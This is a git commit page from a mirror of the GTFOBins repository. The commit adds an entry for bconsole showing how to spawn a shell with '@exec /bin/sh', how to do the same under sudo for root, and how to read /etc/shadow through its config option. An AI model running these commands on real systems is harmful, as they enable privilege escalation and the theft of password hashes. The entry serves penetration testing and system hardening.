mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Create bconsole
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
parent
21e0166608
commit
170c1f5db7
14
_gtfobins/bconsole.md
Normal file
14
_gtfobins/bconsole.md
Normal file
@ -0,0 +1,14 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
bconsole
|
||||||
|
@exec /bin/sh
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
sudo bconsole
|
||||||
|
@exec /bin/sh
|
||||||
|
file-read:
|
||||||
|
- description: The file is actually parsed and the first wrong line is returned in an error message, thus it may not be suitable for reading arbitrary files.
|
||||||
|
code: bconsole -c /etc/shadow
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user